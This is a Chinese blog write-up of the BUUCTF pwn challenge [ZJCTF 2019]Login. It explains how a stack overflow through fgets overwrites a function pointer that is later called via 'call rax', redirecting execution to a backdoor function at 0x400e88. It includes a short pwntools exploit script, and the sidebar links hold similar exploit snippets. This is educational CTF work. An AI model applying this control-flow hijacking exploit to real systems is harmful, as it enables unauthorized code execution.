BUU [ZJCTF 2019]Login

于 2023-03-04 21:03:19 发布
阅读量840 收藏
点赞数
分类专栏: pwn 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fzucaicai/article/details/129318634
版权

这是一道让我感觉很淦的题,整一天了才大致了解了来龙去脉

开始:

首先丢到虚拟机checksec一下看看有啥保护措施:

看到开了Canary,就已经感觉不妙了,接着丢到IDA里看看啥情况
 一看,是令人痛苦的c++风格的代码,加上奇奇怪怪的各种作用域,已经很懵逼了

这里发现了存在一个后门函数。 

不过找了一圈了,除了发现用了fgets函数存在栈溢出的情况,也没其他漏洞了,而且有canary保护,也根本不知道如何泄露出canary。

于是去网上找了一下wp,发现有一种从没用过的牛逼招式,就是改函数调用。

在password_checker这个函数中,传入了一个指针进去,并且调用了这个指针,而调用这个参数指针,是从栈上的数据传进去的,由此我们推测也许可以更改函数的地址,使程序跳转到后门函数执行拿到shell。

我们反汇编一下password_checker看看
 果然调用了rax这个寄存器的内容,那么我们就可以往回追杀,看看这个rax究竟来自于哪里,看看fget函数能不能覆盖到。

 

 

 

 

 

 (直接偷图了)

经过一系列溯源之后,我们可以看到最终call rax的rax来自var_18的位置
(这里要特别说明一下lea指令,它是把栈的地址给寄存器,而有别于mov,如果是mov,中括号里的地址会被索引成对应的内容赋值给寄存器)

所以我们要想办法把var_18改成backdoor的地址即可。

下面是exp:
 

from pwn import *
 
r = remote()
 
backdoor = 0x400e88
r.sendlineafter(': ','admin')
r.sendlineafter(': ','2jctf_pa5sw0rd'+'\x00'*0x3a+p64(backdoor))
 
r.interactive()

cccsl_
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUOJ PWN [ZJCTF 2019]Login
weixin_50287973的博客
11-18 323
输入这些断了下来 是在call rax那断了下来,追踪一下rax [rbp+var_130]的地址作为参数传入User::read_password(void),rax的值赋给了[rbp+var_130] 在password_checker()看看rax怎么来的 这样的话控制[rbp+var_18]为Admin::shell地址就可以了 输入password覆盖到[rbp+var_18] 0x60-0x18=72=14+58 由于_snprintf函数,写入的不含一定0字符的password格式
ZJCTF 2019 Login
pondzhang的专栏
05-19 641
from pwn import * p = process('./login') p.sendlineafter("username: ","admin") payload = "2jctf_pa5sw0rd" + '\x00'*58 + p64(0x0000000000400E88) p.sendlineafter("password: ",payload) p.interactive()
[ZJCTF 2019]Login
、moddemod
07-03 843
exp from pwn import * context.log_level = 'debug' proc_name = './login' # p = process(proc_name) p = remote('node3.buuoj.cn', 29641) ...
buuctf [ZJCTF 2019]Login
carol2358的博客
05-06 1096
先运行,输入admin和2jctf_pa5sw0rd, 发现报错,gdb开始调试 在这里crash了, 去ida里看 ida里自己改名字,原来的看着太乱 反向分析 在read_password里找到var_18 然后通过覆盖var_18, 让他跳到程序自带的shell里 60-18 = 48 e+3a = 48 exp: from pwn import * from LibcSearc...
ZJCTF_2019_Login
z1r0的博客
12-12 2431
ZJCTF_2019_Login 查看保护 输入正确的密码和用户名,会发生错误,看一下汇编。 在crash之前call 了rax,逆一下找到rax被怎样赋值的。
[ZJCTF 2019]Login--动态调试--详细版
weixin_41748164的博客
11-21 617
全网最详细login的解析,包含静态和动态分析
BUU 论坛的编辑器163Editor
09-21
"BUU 论坛的编辑器163Editor"是一个专为BUU论坛设计的文本编辑工具,它可能集成了丰富的富文本编辑功能,让用户在论坛发帖或回帖时可以方便地添加格式化文本、图片、链接等元素,提升交互体验。"DianUbb.rar"是这个...
POSN:POSN-BUU的源代码
04-01
POSN-BUU可能是该系统的一个特定实现或者模块,主要用于处理BUU(Base Unit Unit,基本单元)相关的定位任务。这个源代码是用C++编程语言编写的,C++是一种通用且高效的编程语言,特别适合开发对性能要求高的系统...
Majin Buu Top HD Anime New Tabs Theme-crx插件
03-15
每次打开一个新选项卡,您将获得Majin Buu提供的不同高清壁纸 这个新主题包括时钟等等。 魔鬼的布欧(the devil,Buu),日本动漫《七龙珠》中的义与恶的角色,是《七龙珠》综合实力最强的BOSS。 这个名字来自电影...
BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)
最新发布
05-26
BUU-Reveser-XMAN2018排位赛_easywasm(WebAssembly逆向分析)
The HMT effects on the nucleon collective flows in BUU transport model
03-14
基于BUU模型利用集体流研究HMT效应,张芳,,基于半经典的BUU输运模型,我们利用中-质微分流、中子-质子流之差以及质子椭圆流研究了核内核子动量分布的高动量尾巴(HMT)效应。研
[BUUCTF]PWN——[ZJCTF 2019]Login
mcmuyanga的博客
11-05 1627
[ZJCTF 2019]Login 附件 步骤: 例行检查,64位程序,开启了canary和nx保护 2. 试运行一下程序 3. 64位ida载入,检索字符串,在程序里找到了用户名admin和密码2jctf_pa5sw0rd 再次尝试登录,无果 在程序里找到了后门函数,backdoor=0x400e88 c++写的程序,看起来有点费劲,自己看了好久都找到漏洞在哪里,后来借鉴了其他师傅的wp后才发现了猫腻 问题出现在检查密码的那个函数上 反编译出来的伪代码看起来没什么问题 但是我们按下tab,
[BUUCTF-pwn]——[ZJCTF 2019]Login
Y_peak的博客
03-11 381
[BUUCTF-pwn]——[ZJCTF 2019]Login 题目地址:https://buuoj.cn/challenges#[ZJCTF%202019]Login 这道题学习还是很多的, 有的时候在源码中跟踪并不一定比在汇编代码中跟踪更快 这里最后一个函数的第一个参数会被当做函数执行,这里我就开始找那个地方可以将这个参数给改了。 v7也就是v3然后找来找去没发现。 不过汇编总是有奇效 这里有一篇博客超级详细, 我也就不在这里赘述了。 点击转跳 ...
[ZJCTF 2019]Login的wp
wuyvle的博客
03-05 300
先运行,输入admin和2jctf_pa5sw0rd, 发现报错,gdb开始调试 进入ida看看 在read_password里找到var_18 然后通过覆盖var_18, 让他跳到程序自带的shell里 60-18 = 48 e+3a = 48 exp from pwn import * io = remote('node3.buuoj.cn',28457) shell = 0x400e88 io.sendlineafter(': ','admin') io.sendlineafter('
ZJCTF_login
Morphy_Amo的博客
07-18 484
zjctf_login
CTF-PWN-[ZJCTF 2019]Login 栈位置的转换跟踪
serfend's blog
06-23 1347
来源:https://buuoj.cn/challenges内容:附件:链接:https://pan.baidu.com/s/1uBEYYeg9ouPDEOah-BHGQA?pwd=6si8 提取码:6si8答案:PWN题为动态flag使用安装pwn解题框架发现是cpp的题目,在password_checker的第9行下断点到判断密码的位置,随后输入用户名admin,密码cylic(300)用于测试溢出点和调用点题目是比较密码是否等于,正确则跳转进入 发现此处的值是aaaa,则我们将密码设置为 +cylic
2019-ZJCTF
ChenZIDu的博客
12-13 1100
浙江省大学生网络安全竞赛:逆转思路 这题当初没做出来,可惜了。 主要是php序列化,以及data协议。 <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="w...
【2019】ZJCTF-Web
weixin_47813861的博客
09-20 178
不过如此 <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1>".file_get_contents($text,'r')."</h1></br>"; if(preg_
【Pwn】SWPUCTF_2019_login
Nothing
12-09 1150
例行查看程序保护。 分析程序,最里面函数存在格式化字符串漏洞。但是格式化字符串不再栈上,而在bss段上,没办法直接任意地址读写,于是动态调试观察栈上数据。 观察到fff65158指向fff65168,fff65168指向fff65178。那么就可以修改fff65168的内容,然后再观察栈上还有什么有用数据,注意到fff65160和fff65164的值离got表很近,于是想到可以修改这两个地方的后...
buu cipher
10-23
Buu Cipher 的加密过程可以简单地分为两个步骤:混淆和扩散。 首先,混淆步骤使用一个密钥和置换表对明文进行置换。置换表是由密钥生成的,用于打乱明文中字符的顺序。这样,原本明文中相邻的字符将被分散到密文中...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值